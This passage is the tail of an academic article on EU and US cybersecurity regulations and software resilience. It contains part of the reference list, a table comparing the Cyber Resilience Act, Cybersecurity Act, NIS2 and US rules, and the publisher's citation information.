  58. Tan, Zhuoran, Shameem Parambath, Christos Anagnostopoulos, Jeremy Singer, and Angelos Marnerides. 2025. Advanced Persistent Threats Based on Supply Chain Vulnerabilities: Challenges, Solutions, and Future Directions. IEEE Internet of Things Journal 12: 6371–95. [Google Scholar] [CrossRef]
  59. Tashtoush, Yaser M., Dana M. Darweesh, Ghaith S. Husari, Osama Y. Darwish, Yazan Y. Darwish, Lama A. Issa, and Haitham A. Ashqar. 2022. Agile approaches for cybersecurity systems, IoT and intelligent transportation. IEEE Access 10: 3944–65. [Google Scholar] [CrossRef]
  60. U.S. Cybersecurity and Infrastructure Security Agency (CISA). 2024. Secure Software Development Attestation Form Guidance. Available online: https://www.cisa.gov/resources-tools/resources/secure-software-development-attestation-form (accessed on 20 June 2025).
  61. U.S. National Telecommunications and Information Administration (NTIA). 2021. The Minimum Elements for a Software Bill of Materials (SBOM). U.S. Department of Commerce. Available online: https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom (accessed on 20 June 2025).
  62. Van Bossuyt, Douglas L., Brian L. Hale, Robert M. Arlitt, and Nikos Papakonstantinou. 2023. Zero-trust for the system design lifecycle. Journal of Computing and Information Science in Engineering 23: 060812. [Google Scholar] [CrossRef]
  63. Vandezande, Niels. 2024. Cybersecurity in the EU: How the NIS2-directive stacks up against its predecessor. Computer Law & Security Review 52: 105890. [Google Scholar] [CrossRef]
  64. Von Solms, Sune, and Lynn Futcher. 2020. Adaption of a secure software development methodology for secure engineering design. IEEE Access 8: 113381–92. [Google Scholar] [CrossRef]
  65. Wang, Zhitian, Yifan Wen, Zhen Wang, and Pengyu Zhi. 2023. Resilience-based design optimization of engineering systems under degradation and different maintenance strategy. Structural and Multidisciplinary Optimization 66: 219. [Google Scholar] [CrossRef]
  66. World Economic Forum. 2023. The Global Risks Report 2023, 18th ed. Geneva: World Economic Forum. Available online: https://www3.weforum.org/docs/WEF_Global_Risks_Report_2023.pdf (accessed on 20 June 2024).
  67. Xiao, Yaping, and Jelena Spanjol. 2021. Yes, but not now! Why some users procrastinate in adopting digital product updates. Journal of Business Research 135: 701–11. [Google Scholar] [CrossRef]
Figure 1. Flowchart of the research methodology.
Figure 1. Flowchart of the research methodology.
Socsci 14 00578 g001
Table 1. Synthesis of EU and US regulatory approaches to software security.
Table 1. Synthesis of EU and US regulatory approaches to software security.
CriteriaEU: Cyber Resilience Act (CRA)EU: Cybersecurity Act (CSA)EU: NIS2 DirectiveUSA: Executive Order 14028, FISMA, SBOM Regulation
Responsibility AllocationEstablishes explicit duties for all stakeholders in the digital product supply chain, including manufacturers and developers, with oversight by national authorities.Establishes a voluntary, EU-wide certification framework, with the EU Agency for Cybersecurity (ENISA) in a central coordinating role.Places duties on operators of essential and important services to implement risk management measures, supervised by national authorities.In the US, federal agencies are primarily responsible, but software vendors and suppliers must provide SBOMs and timely updates.
User & Entity ObligationsProducers are required to provide clear information, ensure security updates for the product’s expected lifetime (e.g., up to 5 years), and promptly notify users of vulnerabilities.Provides transparency to users and organizations through voluntary cybersecurity certification schemes and labels, helping to inform purchasing decisions.No direct obligations towards end-users. Main obligations are incident reporting to national authorities and implementing robust risk management measures.US regulations obligate vendors to supply SBOMs, issue regular patches, and communicate vulnerabilities to federal clients.
Approach to SDGIntegrates digital sustainability and consumer protection, aiming for a secure and sustainable digital environment as part of its broader strategies.Promotes institutional trust (SDG 16) and informed consumer choice, contributing to a more transparent and secure single market.Reinforces societal resilience by securing critical infrastructure and essential services (e.g., healthcare, energy), contributing to SDG 9 and 16.US cybersecurity law focuses mainly on national security and protection of federal systems, with less explicit reference to sustainability or SDG principles.
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content.

Share and Cite

MDPI and ACS Style

Kelemen, R.; Squillace, J.; Medvácz, Á.; Cappella, J.; Bucko, B.; Mazuch, M. Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability. Soc. Sci. 2025, 14, 578. https://doi.org/10.3390/socsci14100578

AMA Style

Kelemen R, Squillace J, Medvácz Á, Cappella J, Bucko B, Mazuch M. Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability. Social Sciences. 2025; 14(10):578. https://doi.org/10.3390/socsci14100578

Chicago/Turabian Style

Kelemen, Roland, Joseph Squillace, Ádám Medvácz, Justice Cappella, Boris Bucko, and Martin Mazuch. 2025. "Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability" Social Sciences 14, no. 10: 578. https://doi.org/10.3390/socsci14100578

APA Style

Kelemen, R., Squillace, J., Medvácz, Á., Cappella, J., Bucko, B., & Mazuch, M. (2025). Cybersecurity Regulations and Software Resilience: Strengthening Awareness and Societal Stability. Social Sciences, 14(10), 578. https://doi.org/10.3390/socsci14100578

Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here.

Article Metrics

Back to TopTop